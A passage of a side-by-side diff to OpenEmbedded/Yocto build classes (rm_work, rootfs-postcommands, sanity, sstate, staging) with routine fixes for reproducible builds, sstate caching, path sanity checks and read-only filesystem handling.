96 source_date_epoch = 0 121 bb.debug(1, "Epoch file changed from %s to %s" % (efile, epochfile))
97 if os.path.isfile(epochfile): 122
123 source_date_epoch = int(d.getVar('SOURCE_DATE_EPOCH_FALLBACK'))
124 try:
98 with open(epochfile, 'r') as f: 125 with open(epochfile, 'r') as f:
99 s = f.read() 126 s = f.read()
100 try: 127 try:
101 source_date_epoch = int(s) 128 source_date_epoch = int(s)
102 except ValueError: 129 except ValueError:
103 bb.warn("SOURCE_DATE_EPOCH value '%s' is invalid. Reverting to 0" % s) 130 bb.warn("SOURCE_DATE_EPOCH value '%s' is invalid. Reverting to SOURCE_DATE_EPOCH_FALLBACK" % s)
104 source_date_epoch = 0 131 source_date_epoch = int(d.getVar('SOURCE_DATE_EPOCH_FALLBACK'))
105 bb.debug(1, "SOURCE_DATE_EPOCH: %d" % source_date_epoch) 132 bb.debug(1, "SOURCE_DATE_EPOCH: %d" % source_date_epoch)
106 else: 133 except FileNotFoundError:
107 bb.debug(1, "Cannot find %s. SOURCE_DATE_EPOCH will default to %d" % (epochfile, source_date_epoch)) 134 bb.debug(1, "Cannot find %s. SOURCE_DATE_EPOCH will default to %d" % (epochfile, source_date_epoch))
108 135
109 d.setVar('__CACHED_SOURCE_DATE_EPOCH', str(source_date_epoch)) 136 d.setVar('__CACHED_SOURCE_DATE_EPOCH', (str(source_date_epoch), epochfile))
110 return str(source_date_epoch) 137 return str(source_date_epoch)
111 138
112export SOURCE_DATE_EPOCH ?= "${@get_source_date_epoch_value(d)}" 139export SOURCE_DATE_EPOCH ?= "${@get_source_date_epoch_value(d)}"
113BB_HASHBASE_WHITELIST += "SOURCE_DATE_EPOCH" 140BB_HASHBASE_WHITELIST += "SOURCE_DATE_EPOCH"
114
115python () {
116 if d.getVar('BUILD_REPRODUCIBLE_BINARIES') == '1':
117 d.appendVarFlag("do_unpack", "postfuncs", " create_source_date_epoch_stamp")
118}
diff --git a/meta/classes/rm_work.bbclass b/meta/classes/rm_work.bbclass
index 01c2ab1c78..24051aa378 100644
--- a/meta/classes/rm_work.bbclass
+++ b/meta/classes/rm_work.bbclass
@@ -27,6 +27,13 @@ BB_SCHEDULER ?= "completion"
27BB_TASK_IONICE_LEVEL_task-rm_work = "3.0" 27BB_TASK_IONICE_LEVEL_task-rm_work = "3.0"
28 28
29do_rm_work () { 29do_rm_work () {
30 # Force using the HOSTTOOLS 'rm' - otherwise the SYSROOT_NATIVE 'rm' can be selected depending on PATH
31 # Avoids race-condition accessing 'rm' when deleting WORKDIR folders at the end of this function
32 RM_BIN="$(PATH=${HOSTTOOLS_DIR} command -v rm)"
33 if [ -z "${RM_BIN}" ]; then
34 bbfatal "Binary 'rm' not found in HOSTTOOLS_DIR, cannot remove WORKDIR data."
35 fi
36
30 # If the recipe name is in the RM_WORK_EXCLUDE, skip the recipe. 37 # If the recipe name is in the RM_WORK_EXCLUDE, skip the recipe.
31 for p in ${RM_WORK_EXCLUDE}; do 38 for p in ${RM_WORK_EXCLUDE}; do
32 if [ "$p" = "${PN}" ]; then 39 if [ "$p" = "${PN}" ]; then
@@ -73,7 +80,7 @@ do_rm_work () {
73 # sstate version since otherwise we'd need to leave 'plaindirs' around 80 # sstate version since otherwise we'd need to leave 'plaindirs' around
74 # such as 'packages' and 'packages-split' and these can be large. No end 81 # such as 'packages' and 'packages-split' and these can be large. No end
75 # of chain tasks depend directly on do_package anymore. 82 # of chain tasks depend directly on do_package anymore.
76 rm -f $i; 83 "${RM_BIN}" -f -- $i;
77 ;; 84 ;;
78 *_setscene*) 85 *_setscene*)
79 # Skip stamps which are already setscene versions 86 # Skip stamps which are already setscene versions
@@ -90,7 +97,7 @@ do_rm_work () {
90 ;; 97 ;;
91 esac 98 esac
92 done 99 done
93 rm -f $i 100 "${RM_BIN}" -f -- $i
94 esac 101 esac
95 done 102 done
96 103
@@ -100,9 +107,9 @@ do_rm_work () {
100 # Retain only logs and other files in temp, safely ignore 107 # Retain only logs and other files in temp, safely ignore
101 # failures of removing pseudo folers on NFS2/3 server. 108 # failures of removing pseudo folers on NFS2/3 server.
102 if [ $dir = 'pseudo' ]; then 109 if [ $dir = 'pseudo' ]; then
103 rm -rf $dir 2> /dev/null || true 110 "${RM_BIN}" -rf -- $dir 2> /dev/null || true
104 elif ! echo "$excludes" | grep -q -w "$dir"; then 111 elif ! echo "$excludes" | grep -q -w "$dir"; then
105 rm -rf $dir 112 "${RM_BIN}" -rf -- $dir
106 fi 113 fi
107 done 114 done
108} 115}
diff --git a/meta/classes/rootfs-postcommands.bbclass b/meta/classes/rootfs-postcommands.bbclass
index c43b9a9823..943534c57a 100644
--- a/meta/classes/rootfs-postcommands.bbclass
+++ b/meta/classes/rootfs-postcommands.bbclass
@@ -1,6 +1,6 @@
1 1
2# Zap the root password if debug-tweaks feature is not enabled 2# Zap the root password if debug-tweaks feature is not enabled
3ROOTFS_POSTPROCESS_COMMAND += '${@bb.utils.contains_any("IMAGE_FEATURES", [ 'debug-tweaks', 'empty-root-password' ], "", "zap_empty_root_password ; ",d)}' 3ROOTFS_POSTPROCESS_COMMAND += '${@bb.utils.contains_any("IMAGE_FEATURES", [ 'debug-tweaks', 'empty-root-password' ], "", "zap_empty_root_password; ",d)}'
4 4
5# Allow dropbear/openssh to accept logins from accounts with an empty password string if debug-tweaks or allow-empty-password is enabled 5# Allow dropbear/openssh to accept logins from accounts with an empty password string if debug-tweaks or allow-empty-password is enabled
6ROOTFS_POSTPROCESS_COMMAND += '${@bb.utils.contains_any("IMAGE_FEATURES", [ 'debug-tweaks', 'allow-empty-password' ], "ssh_allow_empty_password; ", "",d)}' 6ROOTFS_POSTPROCESS_COMMAND += '${@bb.utils.contains_any("IMAGE_FEATURES", [ 'debug-tweaks', 'allow-empty-password' ], "ssh_allow_empty_password; ", "",d)}'
@@ -12,7 +12,7 @@ ROOTFS_POSTPROCESS_COMMAND += '${@bb.utils.contains_any("IMAGE_FEATURES", [ 'deb
12ROOTFS_POSTPROCESS_COMMAND += '${@bb.utils.contains_any("IMAGE_FEATURES", [ 'debug-tweaks', 'post-install-logging' ], "postinst_enable_logging; ", "",d)}' 12ROOTFS_POSTPROCESS_COMMAND += '${@bb.utils.contains_any("IMAGE_FEATURES", [ 'debug-tweaks', 'post-install-logging' ], "postinst_enable_logging; ", "",d)}'
13 13
14# Create /etc/timestamp during image construction to give a reasonably sane default time setting 14# Create /etc/timestamp during image construction to give a reasonably sane default time setting
15ROOTFS_POSTPROCESS_COMMAND += "rootfs_update_timestamp ; " 15ROOTFS_POSTPROCESS_COMMAND += "rootfs_update_timestamp; "
16 16
17# Tweak the mount options for rootfs in /etc/fstab if read-only-rootfs is enabled 17# Tweak the mount options for rootfs in /etc/fstab if read-only-rootfs is enabled
18ROOTFS_POSTPROCESS_COMMAND += '${@bb.utils.contains("IMAGE_FEATURES", "read-only-rootfs", "read_only_rootfs_hook; ", "",d)}' 18ROOTFS_POSTPROCESS_COMMAND += '${@bb.utils.contains("IMAGE_FEATURES", "read-only-rootfs", "read_only_rootfs_hook; ", "",d)}'
@@ -26,7 +26,7 @@ ROOTFS_POSTPROCESS_COMMAND += '${@bb.utils.contains("IMAGE_FEATURES", "read-only
26APPEND_append = '${@bb.utils.contains("IMAGE_FEATURES", "read-only-rootfs", " ro", "", d)}' 26APPEND_append = '${@bb.utils.contains("IMAGE_FEATURES", "read-only-rootfs", " ro", "", d)}'
27 27
28# Generates test data file with data store variables expanded in json format 28# Generates test data file with data store variables expanded in json format
29ROOTFS_POSTPROCESS_COMMAND += "write_image_test_data ; " 29ROOTFS_POSTPROCESS_COMMAND += "write_image_test_data; "
30 30
31# Write manifest 31# Write manifest
32IMAGE_MANIFEST = "${IMGDEPLOYDIR}/${IMAGE_NAME}${IMAGE_NAME_SUFFIX}.manifest" 32IMAGE_MANIFEST = "${IMGDEPLOYDIR}/${IMAGE_NAME}${IMAGE_NAME_SUFFIX}.manifest"
@@ -267,9 +267,10 @@ python write_image_manifest () {
267 267
268 if os.path.exists(manifest_name) and link_name: 268 if os.path.exists(manifest_name) and link_name:
269 manifest_link = deploy_dir + "/" + link_name + ".manifest" 269 manifest_link = deploy_dir + "/" + link_name + ".manifest"
270 if os.path.lexists(manifest_link): 270 if manifest_link != manifest_name:
271 os.remove(manifest_link) 271 if os.path.lexists(manifest_link):
272 os.symlink(os.path.basename(manifest_name), manifest_link) 272 os.remove(manifest_link)
273 os.symlink(os.path.basename(manifest_name), manifest_link)
273} 274}
274 275
275# Can be used to create /etc/timestamp during image construction to give a reasonably 276# Can be used to create /etc/timestamp during image construction to give a reasonably
@@ -304,7 +305,7 @@ rootfs_trim_schemas () {
304} 305}
305 306
306rootfs_check_host_user_contaminated () { 307rootfs_check_host_user_contaminated () {
307 contaminated="${WORKDIR}/host-user-contaminated.txt" 308 contaminated="${S}/host-user-contaminated.txt"
308 HOST_USER_UID="$(PSEUDO_UNLOAD=1 id -u)" 309 HOST_USER_UID="$(PSEUDO_UNLOAD=1 id -u)"
309 HOST_USER_GID="$(PSEUDO_UNLOAD=1 id -g)" 310 HOST_USER_GID="$(PSEUDO_UNLOAD=1 id -g)"
310 311
@@ -339,9 +340,10 @@ python write_image_test_data() {
339 340
340 if os.path.exists(testdata_name) and link_name: 341 if os.path.exists(testdata_name) and link_name:
341 testdata_link = os.path.join(deploy_dir, "%s.testdata.json" % link_name) 342 testdata_link = os.path.join(deploy_dir, "%s.testdata.json" % link_name)
342 if os.path.lexists(testdata_link): 343 if testdata_link != testdata_name:
343 os.remove(testdata_link) 344 if os.path.lexists(testdata_link):
344 os.symlink(os.path.basename(testdata_name), testdata_link) 345 os.remove(testdata_link)
346 os.symlink(os.path.basename(testdata_name), testdata_link)
345} 347}
346write_image_test_data[vardepsexclude] += "TOPDIR" 348write_image_test_data[vardepsexclude] += "TOPDIR"
347 349
diff --git a/meta/classes/rootfsdebugfiles.bbclass b/meta/classes/rootfsdebugfiles.bbclass
index e2ba4e3647..85c7ec7434 100644
--- a/meta/classes/rootfsdebugfiles.bbclass
+++ b/meta/classes/rootfsdebugfiles.bbclass
@@ -28,7 +28,7 @@
28ROOTFS_DEBUG_FILES ?= "" 28ROOTFS_DEBUG_FILES ?= ""
29ROOTFS_DEBUG_FILES[doc] = "Lists additional files or directories to be installed with 'cp -a' in the format 'source1 target1;source2 target2;...'" 29ROOTFS_DEBUG_FILES[doc] = "Lists additional files or directories to be installed with 'cp -a' in the format 'source1 target1;source2 target2;...'"
30 30
31ROOTFS_POSTPROCESS_COMMAND += "rootfs_debug_files ;" 31ROOTFS_POSTPROCESS_COMMAND += "rootfs_debug_files;"
32rootfs_debug_files () { 32rootfs_debug_files () {
33 #!/bin/sh -e 33 #!/bin/sh -e
34 echo "${ROOTFS_DEBUG_FILES}" | sed -e 's/;/\n/g' | while read source target mode; do 34 echo "${ROOTFS_DEBUG_FILES}" | sed -e 's/;/\n/g' | while read source target mode; do
diff --git a/meta/classes/sanity.bbclass b/meta/classes/sanity.bbclass
index 866d066288..33e5e5952f 100644
--- a/meta/classes/sanity.bbclass
+++ b/meta/classes/sanity.bbclass
@@ -392,9 +392,12 @@ def check_connectivity(d):
392 msg = data.getVar('CONNECTIVITY_CHECK_MSG') or "" 392 msg = data.getVar('CONNECTIVITY_CHECK_MSG') or ""
393 if len(msg) == 0: 393 if len(msg) == 0:
394 msg = "%s.\n" % err 394 msg = "%s.\n" % err
395 msg += " Please ensure your host's network is configured correctly,\n" 395 msg += " Please ensure your host's network is configured correctly.\n"
396 msg += " or set BB_NO_NETWORK = \"1\" to disable network access if\n" 396 msg += " If your ISP or network is blocking the above URL,\n"
397 msg += " all required sources are on local disk.\n" 397 msg += " try with another domain name, for example by setting:\n"
398 msg += " CONNECTIVITY_CHECK_URIS = \"https://www.example.com/\""
399 msg += " You could also set BB_NO_NETWORK = \"1\" to disable network\n"
400 msg += " access if all required sources are on local disk.\n"
398 retval = msg 401 retval = msg
399 402
400 return retval 403 return retval
@@ -558,6 +561,14 @@ def check_tar_version(sanity_data):
558 version = result.split()[3] 561 version = result.split()[3]
559 if LooseVersion(version) < LooseVersion("1.28"): 562 if LooseVersion(version) < LooseVersion("1.28"):
560 return "Your version of tar is older than 1.28 and does not have the support needed to enable reproducible builds. Please install a newer version of tar (you could use the project's buildtools-tarball from our last release or use scripts/install-buildtools).\n" 563 return "Your version of tar is older than 1.28 and does not have the support needed to enable reproducible builds. Please install a newer version of tar (you could use the project's buildtools-tarball from our last release or use scripts/install-buildtools).\n"
564
565 try:
566 result = subprocess.check_output(["tar", "--help"], stderr=subprocess.STDOUT).decode('utf-8')
567 if "--xattrs" not in result:
568 return "Your tar doesn't support --xattrs, please use GNU tar.\n"
569 except subprocess.CalledProcessError as e:
570 return "Unable to execute tar --help, exit code %d\n%s\n" % (e.returncode, e.output)
571
561 return None 572 return None
562 573
563# We use git parameters and functionality only found in 1.7.8 or later 574# We use git parameters and functionality only found in 1.7.8 or later
@@ -882,13 +893,18 @@ def check_sanity_everybuild(status, d):
882 except: 893 except:
883 pass 894 pass
884 895
885 oeroot = d.getVar('COREBASE') 896 for checkdir in ['COREBASE', 'TMPDIR']:
886 if oeroot.find('+') != -1: 897 val = d.getVar(checkdir)
887 status.addresult("Error, you have an invalid character (+) in your COREBASE directory path. Please move the installation to a directory which doesn't include any + characters.") 898 if val.find('..') != -1:
888 if oeroot.find('@') != -1: 899 status.addresult("Error, you have '..' in your %s directory path. Please ensure the variable contains an absolute path as this can break some recipe builds in obtuse ways." % checkdir)
889 status.addresult("Error, you have an invalid character (@) in your COREBASE directory path. Please move the installation to a directory which doesn't include any @ characters.") 900 if val.find('+') != -1:
890 if oeroot.find(' ') != -1: 901 status.addresult("Error, you have an invalid character (+) in your %s directory path. Please move the installation to a directory which doesn't include any + characters." % checkdir)
891 status.addresult("Error, you have a space in your COREBASE directory path. Please move the installation to a directory which doesn't include a space since autotools doesn't support this.") 902 if val.find('@') != -1:
903 status.addresult("Error, you have an invalid character (@) in your %s directory path. Please move the installation to a directory which doesn't include any @ characters." % checkdir)
904 if val.find(' ') != -1:
905 status.addresult("Error, you have a space in your %s directory path. Please move the installation to a directory which doesn't include a space since autotools doesn't support this." % checkdir)
906 if val.find('%') != -1:
907 status.addresult("Error, you have an invalid character (%) in your %s directory path which causes problems with python string formatting. Please move the installation to a directory which doesn't include any % characters." % checkdir)
892 908
893 # Check the format of MIRRORS, PREMIRRORS and SSTATE_MIRRORS 909 # Check the format of MIRRORS, PREMIRRORS and SSTATE_MIRRORS
894 import re 910 import re
diff --git a/meta/classes/sstate.bbclass b/meta/classes/sstate.bbclass
index a8e169a10b..1058778980 100644
--- a/meta/classes/sstate.bbclass
+++ b/meta/classes/sstate.bbclass
@@ -20,7 +20,7 @@ def generate_sstatefn(spec, hash, taskname, siginfo, d):
20 components = spec.split(":") 20 components = spec.split(":")
21 # Fields 0,5,6 are mandatory, 1 is most useful, 2,3,4 are just for information 21 # Fields 0,5,6 are mandatory, 1 is most useful, 2,3,4 are just for information
22 # 7 is for the separators 22 # 7 is for the separators
23 avail = (254 - len(hash + "_" + taskname + extension) - len(components[0]) - len(components[1]) - len(components[5]) - len(components[6]) - 7) // 3 23 avail = (limit - len(hash + "_" + taskname + extension) - len(components[0]) - len(components[1]) - len(components[5]) - len(components[6]) - 7) // 3
24 components[2] = components[2][:avail] 24 components[2] = components[2][:avail]
25 components[3] = components[3][:avail] 25 components[3] = components[3][:avail]
26 components[4] = components[4][:avail] 26 components[4] = components[4][:avail]
@@ -123,8 +123,6 @@ SSTATE_HASHEQUIV_REPORT_TASKDATA[doc] = "Report additional useful data to the \
123python () { 123python () {
124 if bb.data.inherits_class('native', d): 124 if bb.data.inherits_class('native', d):
125 d.setVar('SSTATE_PKGARCH', d.getVar('BUILD_ARCH', False)) 125 d.setVar('SSTATE_PKGARCH', d.getVar('BUILD_ARCH', False))
126 if d.getVar("PN") == "pseudo-native":
127 d.appendVar('SSTATE_PKGARCH', '_${ORIGNATIVELSBSTRING}')
128 elif bb.data.inherits_class('crosssdk', d): 126 elif bb.data.inherits_class('crosssdk', d):
129 d.setVar('SSTATE_PKGARCH', d.expand("${BUILD_ARCH}_${SDK_ARCH}_${SDK_OS}")) 127 d.setVar('SSTATE_PKGARCH', d.expand("${BUILD_ARCH}_${SDK_ARCH}_${SDK_OS}"))
130 elif bb.data.inherits_class('cross', d): 128 elif bb.data.inherits_class('cross', d):
@@ -319,6 +317,8 @@ def sstate_install(ss, d):
319 if os.path.exists(i): 317 if os.path.exists(i):
320 with open(i, "r") as f: 318 with open(i, "r") as f:
321 manifests = f.readlines() 319 manifests = f.readlines()
320 # We append new entries, we don't remove older entries which may have the same
321 # manifest name but different versions from stamp/workdir. See below.
322 if filedata not in manifests: 322 if filedata not in manifests:
323 with open(i, "a+") as f: 323 with open(i, "a+") as f:
324 f.write(filedata) 324 f.write(filedata)
@@ -481,7 +481,7 @@ def sstate_clean_cachefiles(d):
481 ss = sstate_state_fromvars(ld, task) 481 ss = sstate_state_fromvars(ld, task)
482 sstate_clean_cachefile(ss, ld) 482 sstate_clean_cachefile(ss, ld)
483 483
484def sstate_clean_manifest(manifest, d, prefix=None): 484def sstate_clean_manifest(manifest, d, canrace=False, prefix=None):
485 import oe.path 485 import oe.path
486 486
487 mfile = open(manifest) 487 mfile = open(manifest)
@@ -499,7 +499,9 @@ def sstate_clean_manifest(manifest, d, prefix=None):
499 if entry.endswith("/"): 499 if entry.endswith("/"):
500 if os.path.islink(entry[:-1]): 500 if os.path.islink(entry[:-1]):
501 os.remove(entry[:-1]) 501 os.remove(entry[:-1])
502 elif os.path.exists(entry) and len(os.listdir(entry)) == 0: 502 elif os.path.exists(entry) and len(os.listdir(entry)) == 0 and not canrace:
503 # Removing directories whilst builds are in progress exposes a race. Only
504 # do it in contexts where it is safe to do so.
503 os.rmdir(entry[:-1]) 505 os.rmdir(entry[:-1])
504 else: 506 else:
505 os.remove(entry) 507 os.remove(entry)
@@ -537,7 +539,7 @@ def sstate_clean(ss, d):
537 for lock in ss['lockfiles']: 539 for lock in ss['lockfiles']:
538 locks.append(bb.utils.lockfile(lock)) 540 locks.append(bb.utils.lockfile(lock))
539 541
540 sstate_clean_manifest(manifest, d) 542 sstate_clean_manifest(manifest, d, canrace=True)
541 543
542 for lock in locks: 544 for lock in locks:
543 bb.utils.unlockfile(lock) 545 bb.utils.unlockfile(lock)
@@ -638,10 +640,21 @@ python sstate_hardcode_path () {
638 640
639def sstate_package(ss, d): 641def sstate_package(ss, d):
640 import oe.path 642 import oe.path
643 import time
641 644
642 tmpdir = d.getVar('TMPDIR') 645 tmpdir = d.getVar('TMPDIR')
643 646
647 fixtime = False
648 if ss['task'] == "package":
649 fixtime = True
650
651 def fixtimestamp(root, path):
652 f = os.path.join(root, path)
653 if os.lstat(f).st_mtime > sde:
654 os.utime(f, (sde, sde), follow_symlinks=False)
655
644 sstatebuild = d.expand("${WORKDIR}/sstate-build-%s/" % ss['task']) 656 sstatebuild = d.expand("${WORKDIR}/sstate-build-%s/" % ss['task'])
657 sde = int(d.getVar("SOURCE_DATE_EPOCH") or time.time())
645 d.setVar("SSTATE_CURRTASK", ss['task']) 658 d.setVar("SSTATE_CURRTASK", ss['task'])
646 bb.utils.remove(sstatebuild, recurse=True) 659 bb.utils.remove(sstatebuild, recurse=True)
647 bb.utils.mkdirhier(sstatebuild) 660 bb.utils.mkdirhier(sstatebuild)
@@ -654,6 +667,8 @@ def sstate_package(ss, d):
654 # to sstate tasks but there aren't many of these so better just avoid them entirely. 667 # to sstate tasks but there aren't many of these so better just avoid them entirely.
655 for walkroot, dirs, files in os.walk(state[1]): 668 for walkroot, dirs, files in os.walk(state[1]):
656 for file in files + dirs: 669 for file in files + dirs:
670 if fixtime:
671 fixtimestamp(walkroot, file)
657 srcpath = os.path.join(walkroot, file) 672 srcpath = os.path.join(walkroot, file)
658 if not os.path.islink(srcpath): 673 if not os.path.islink(srcpath):
659 continue 674 continue
@@ -675,6 +690,11 @@ def sstate_package(ss, d):
675 bb.utils.mkdirhier(plain) 690 bb.utils.mkdirhier(plain)
676 bb.utils.mkdirhier(pdir) 691 bb.utils.mkdirhier(pdir)
677 os.rename(plain, pdir) 692 os.rename(plain, pdir)
693 if fixtime:
694 fixtimestamp(pdir, "")
695 for walkroot, dirs, files in os.walk(pdir):
696 for file in files + dirs:
697 fixtimestamp(walkroot, file)
678 698
679 d.setVar('SSTATE_BUILDDIR', sstatebuild) 699 d.setVar('SSTATE_BUILDDIR', sstatebuild)
680 d.setVar('SSTATE_INSTDIR', sstatebuild) 700 d.setVar('SSTATE_INSTDIR', sstatebuild)
@@ -701,9 +721,16 @@ def sstate_package(ss, d):
701 os.utime(siginfo, None) 721 os.utime(siginfo, None)
702 except PermissionError: 722 except PermissionError:
703 pass 723 pass
724 except OSError as e:
725 # Handle read-only file systems gracefully
726 import errno
727 if e.errno != errno.EROFS:
728 raise e
704 729
705 return 730 return
706 731
732sstate_package[vardepsexclude] += "SSTATE_SIG_KEY"
733
707def pstaging_fetch(sstatefetch, d): 734def pstaging_fetch(sstatefetch, d):
708 import bb.fetch2 735 import bb.fetch2
709 736
@@ -787,7 +814,7 @@ sstate_task_postfunc[dirs] = "${WORKDIR}"
787sstate_create_package () { 814sstate_create_package () {
788 # Exit early if it already exists 815 # Exit early if it already exists
789 if [ -e ${SSTATE_PKG} ]; then 816 if [ -e ${SSTATE_PKG} ]; then
790 [ ! -w ${SSTATE_PKG} ] || touch ${SSTATE_PKG} 817 touch ${SSTATE_PKG} 2>/dev/null || true
791 return 818 return
792 fi 819 fi
793 820
@@ -814,14 +841,18 @@ sstate_create_package () {
814 fi 841 fi
815 chmod 0664 $TFILE 842 chmod 0664 $TFILE
816 # Skip if it was already created by some other process 843 # Skip if it was already created by some other process
817 if [ ! -e ${SSTATE_PKG} ]; then 844 if [ -h ${SSTATE_PKG} ] && [ ! -e ${SSTATE_PKG} ]; then
845 # There is a symbolic link, but it links to nothing.
846 # Forcefully replace it with the new file.
847 ln -f $TFILE ${SSTATE_PKG} || true
848 elif [ ! -e ${SSTATE_PKG} ]; then
818 # Move into place using ln to attempt an atomic op. 849 # Move into place using ln to attempt an atomic op.
819 # Abort if it already exists 850 # Abort if it already exists
820 ln $TFILE ${SSTATE_PKG} && rm $TFILE 851 ln $TFILE ${SSTATE_PKG} || true
821 else 852 else
822 rm $TFILE 853 touch ${SSTATE_PKG} 2>/dev/null || true
823 fi 854 fi
824 [ ! -w ${SSTATE_PKG} ] || touch ${SSTATE_PKG} 855 rm $TFILE
825} 856}
826 857
827python sstate_sign_package () { 858python sstate_sign_package () {
@@ -850,12 +881,12 @@ python sstate_report_unihash() {
850# 881#
851sstate_unpack_package () { 882sstate_unpack_package () {
852 tar -xvzf ${SSTATE_PKG} 883 tar -xvzf ${SSTATE_PKG}
853 # update .siginfo atime on local/NFS mirror 884 # update .siginfo atime on local/NFS mirror if it is a symbolic link
854 [ -O ${SSTATE_PKG}.siginfo ] && [ -w ${SSTATE_PKG}.siginfo ] && [ -h ${SSTATE_PKG}.siginfo ] && touch -a ${SSTATE_PKG}.siginfo 885 [ ! -h ${SSTATE_PKG}.siginfo ] || [ ! -e ${SSTATE_PKG}.siginfo ] || touch -a ${SSTATE_PKG}.siginfo 2>/dev/null || true
855 # Use "! -w ||" to return true for read only files 886 # update each symbolic link instead of any referenced file
856 [ ! -w ${SSTATE_PKG} ] || touch --no-dereference ${SSTATE_PKG} 887 touch --no-dereference ${SSTATE_PKG} 2>/dev/null || true
857 [ ! -w ${SSTATE_PKG}.sig ] || [ ! -e ${SSTATE_PKG}.sig ] || touch --no-dereference ${SSTATE_PKG}.sig 888 [ ! -e ${SSTATE_PKG}.sig ] || touch --no-dereference ${SSTATE_PKG}.sig 2>/dev/null || true
858 [ ! -w ${SSTATE_PKG}.siginfo ] || [ ! -e ${SSTATE_PKG}.siginfo ] || touch --no-dereference ${SSTATE_PKG}.siginfo 889 [ ! -e ${SSTATE_PKG}.siginfo ] || touch --no-dereference ${SSTATE_PKG}.siginfo 2>/dev/null || true
859} 890}
860 891
861BB_HASHCHECK_FUNCTION = "sstate_checkhashes" 892BB_HASHCHECK_FUNCTION = "sstate_checkhashes"
@@ -930,7 +961,7 @@ def sstate_checkhashes(sq_data, d, siginfo=False, currentcount=0, summary=True,
930 961
931 localdata2 = bb.data.createCopy(localdata) 962 localdata2 = bb.data.createCopy(localdata)
932 srcuri = "file://" + sstatefile 963 srcuri = "file://" + sstatefile
933 localdata.setVar('SRC_URI', srcuri) 964 localdata2.setVar('SRC_URI', srcuri)
934 bb.debug(2, "SState: Attempting to fetch %s" % srcuri) 965 bb.debug(2, "SState: Attempting to fetch %s" % srcuri)
935 966
936 try: 967 try:
@@ -941,10 +972,11 @@ def sstate_checkhashes(sq_data, d, siginfo=False, currentcount=0, summary=True,
941 found.add(tid) 972 found.add(tid)
942 if tid in missed: 973 if tid in missed:
943 missed.remove(tid) 974 missed.remove(tid)
944 except: 975 except bb.fetch2.FetchError as e:
945 missed.add(tid) 976 missed.add(tid)
946 bb.debug(2, "SState: Unsuccessful fetch test for %s" % srcuri) 977 bb.debug(2, "SState: Unsuccessful fetch test for %s (%s)" % (srcuri, e))
947 pass 978 except Exception as e:
979 bb.error("SState: cannot test %s: %s" % (srcuri, e))
948 if len(tasklist) >= min_tasks: 980 if len(tasklist) >= min_tasks:
949 bb.event.fire(bb.event.ProcessProgress(msg, len(tasklist) - thread_worker.tasks.qsize()), d) 981 bb.event.fire(bb.event.ProcessProgress(msg, len(tasklist) - thread_worker.tasks.qsize()), d)
950 982
@@ -1006,6 +1038,7 @@ def sstate_checkhashes(sq_data, d, siginfo=False, currentcount=0, summary=True,
1006 bb.parse.siggen.checkhashes(sq_data, missed, found, d) 1038 bb.parse.siggen.checkhashes(sq_data, missed, found, d)
1007 1039
1008 return found 1040 return found
1041setscene_depvalid[vardepsexclude] = "SSTATE_EXCLUDEDEPS_SYSROOT"
1009 1042
1010BB_SETSCENE_DEPVALID = "setscene_depvalid" 1043BB_SETSCENE_DEPVALID = "setscene_depvalid"
1011 1044
@@ -1031,6 +1064,10 @@ def setscene_depvalid(task, taskdependees, notneeded, d, log=None):
1031 if taskdependees[task][1] == "do_populate_lic": 1064 if taskdependees[task][1] == "do_populate_lic":
1032 return True 1065 return True
1033 1066
1067 # We only need to trigger deploy_source_date_epoch through direct dependencies
1068 if taskdependees[task][1] == "do_deploy_source_date_epoch":
1069 return True
1070
1034 # stash_locale and gcc_stash_builddir are never needed as a dependency for built objects 1071 # stash_locale and gcc_stash_builddir are never needed as a dependency for built objects
1035 if taskdependees[task][1] == "do_stash_locale" or taskdependees[task][1] == "do_gcc_stash_builddir": 1072 if taskdependees[task][1] == "do_stash_locale" or taskdependees[task][1] == "do_gcc_stash_builddir":
1036 return True 1073 return True
@@ -1137,6 +1174,11 @@ python sstate_eventhandler() {
1137 os.utime(siginfo, None) 1174 os.utime(siginfo, None)
1138 except PermissionError: 1175 except PermissionError:
1139 pass 1176 pass
1177 except OSError as e:
1178 # Handle read-only file systems gracefully
1179 import errno
1180 if e.errno != errno.EROFS:
1181 raise e
1140 1182
1141} 1183}
1142 1184
@@ -1175,11 +1217,21 @@ python sstate_eventhandler2() {
1175 i = d.expand("${SSTATE_MANIFESTS}/index-" + a) 1217 i = d.expand("${SSTATE_MANIFESTS}/index-" + a)
1176 if not os.path.exists(i): 1218 if not os.path.exists(i):
1177 continue 1219 continue
1220 manseen = set()
1221 ignore = []
1178 with open(i, "r") as f: 1222 with open(i, "r") as f:
1179 lines = f.readlines() 1223 lines = f.readlines()
1180 for l in lines: 1224 for l in reversed(lines):
1181 try: 1225 try:
1182 (stamp, manifest, workdir) = l.split() 1226 (stamp, manifest, workdir) = l.split()
1227 # The index may have multiple entries for the same manifest as the code above only appends
1228 # new entries and there may be an entry with matching manifest but differing version in stamp/workdir.
1229 # The last entry in the list is the valid one, any earlier entries with matching manifests
1230 # should be ignored.
1231 if manifest in manseen:
1232 ignore.append(l)
1233 continue
1234 manseen.add(manifest)
1183 if stamp not in stamps and stamp not in preservestamps and stamp in machineindex: 1235 if stamp not in stamps and stamp not in preservestamps and stamp in machineindex:
1184 toremove.append(l) 1236 toremove.append(l)
1185 if stamp not in seen: 1237 if stamp not in seen:
@@ -1210,6 +1262,8 @@ python sstate_eventhandler2() {
1210 1262
1211 with open(i, "w") as f: 1263 with open(i, "w") as f:
1212 for l in lines: 1264 for l in lines:
1265 if l in ignore:
1266 continue
1213 f.write(l) 1267 f.write(l)
1214 machineindex |= set(stamps) 1268 machineindex |= set(stamps)
1215 with open(mi, "w") as f: 1269 with open(mi, "w") as f:
diff --git a/meta/classes/staging.bbclass b/meta/classes/staging.bbclass
index 506ce0665e..21523c8f75 100644
--- a/meta/classes/staging.bbclass
+++ b/meta/classes/staging.bbclass
@@ -267,6 +267,10 @@ python extend_recipe_sysroot() {
267 pn = d.getVar("PN") 267 pn = d.getVar("PN")
268 stagingdir = d.getVar("STAGING_DIR") 268 stagingdir = d.getVar("STAGING_DIR")
269 sharedmanifests = d.getVar("COMPONENTS_DIR") + "/manifests" 269 sharedmanifests = d.getVar("COMPONENTS_DIR") + "/manifests"
270 # only needed by multilib cross-canadian since it redefines RECIPE_SYSROOT
271 manifestprefix = d.getVar("RECIPE_SYSROOT_MANIFEST_SUBDIR")
272 if manifestprefix:
273 sharedmanifests = sharedmanifests + "/" + manifestprefix
270 recipesysroot = d.getVar("RECIPE_SYSROOT") 274 recipesysroot = d.getVar("RECIPE_SYSROOT")
